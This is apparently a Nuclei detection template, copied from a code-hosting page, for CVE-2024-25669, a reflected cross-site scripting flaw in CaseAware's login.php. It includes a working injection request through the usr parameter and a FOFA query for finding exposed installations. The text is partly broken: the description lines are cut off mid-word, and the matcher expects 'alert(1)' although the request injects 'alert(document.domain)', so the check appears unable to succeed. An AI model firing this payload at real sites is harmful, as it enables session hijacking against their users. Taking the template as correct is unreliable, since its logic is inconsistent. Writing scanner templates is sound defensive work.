53 lines
1.8 KiB
YAML
53 lines
1.8 KiB
YAML
id: CVE-2024-25669
|
|
|
|
info:
|
|
name: CaseAware a360inc - Cross-Site Scripting
|
|
author: r3naissance
|
|
severity: medium
|
|
description: |
|
|
a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017->
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of t>
|
|
remediation: |
|
|
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-25669
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2024-25669
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00286
|
|
epss-percentile: 0.65504
|
|
cpe: cpe:2.3:a:a360inc:caseaware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
vendor: a360inc
|
|
product: caseaware
|
|
fofa-query: title="CaseAware"
|
|
tags: cve,cve2024,xss,caseaware,a360inc
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "value='test' draggable=true ondrag=alert(1)"
|
|
- "CaseAware"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022063a4860371aa962027f08ce65caa9c6e56bed6d9fd642b4cab5858e9d2a0a587022021dcde63411dd8b8b4dd8a5dba94fb391fef32f46017894d5039290689784bb2:922c64590222798bb761d5b6d8e72950 |